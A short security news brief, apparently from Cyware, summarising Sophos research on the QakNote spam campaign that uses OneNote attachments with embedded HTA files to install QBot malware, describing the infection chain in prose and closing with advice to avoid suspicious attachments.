Go to listing page

QakNote Campaign Leverages OneNote to Infect Victims with QBot

QakNote Campaign Leverages OneNote to Infect Victims with QBot
Qakbot, aka Qbot, Quackbot, or Pinkslipbot, has evolved from a banking trojan into a multi-purpose botnet capable of performing reconnaissance, moving laterally, stealing and exfiltrating data, and delivering malicious payloads. Since late January, QBot's operators have started experimenting with a new distribution method using OneNote files to infect systems. This new malware campaign has been dubbed QakNote.

What’s new?

Sophos researchers observed two parallel spam campaigns distributing malicious Microsoft OneNote attachments embedded with an HTML application (HTA file).
  • In one, threat actors send impersonal malspams with an embedded link to the weaponized .one file.
  • In the other one, they utilized the thread injections method where they hijack existing email threads and send a reply-to-all message to its participants with an attached malicious OneNote notebook. 
  • Subject matter in these messages varies, however, most attachments were named either ApplicationReject_#####(Jan31)[.]one or ComplaintCopy_#####(Feb01)[.]one.
  • Threat actors use a fake Double Click to View File button or some other call to action in the Notebook file that supposedly downloads the document from the cloud.

Technical insights

If the user clicks the button, it runs the embedded HTA attachment file that further retrieves the malware payload.
  • Once launched, the embedded attachments can execute commands on the local machine to download and install QBot.
  • Most of the .hta files contain identical scripting language and instructions for the rest of the attack to follow.
  • The HTA file script uses the legitimate curl.exe application to download a DLL file (QBot payload) to the C:\ProgramData folder and is then executed using Rundll32[.]exe.
  • The malware payload injects itself into the Windows Assistive Technology manager (AtBroker.exe) to conceal its presence and evade detection from AV tools running on the device.

Wrapping up

After Microsoft disabled malicious macros in Office documents in July 2022, threat actors are finding newer options to execute code on targets' devices. Discovered in the wild in 2007, QBot is a prominent malware group and other groups can follow its distribution method in an automated and streamlined fashion. Thus, users are suggested to heed the warnings and avoid opening suspicious attachments or links to prevent any kind of infection.
Cyware Publisher

Publisher

Cyware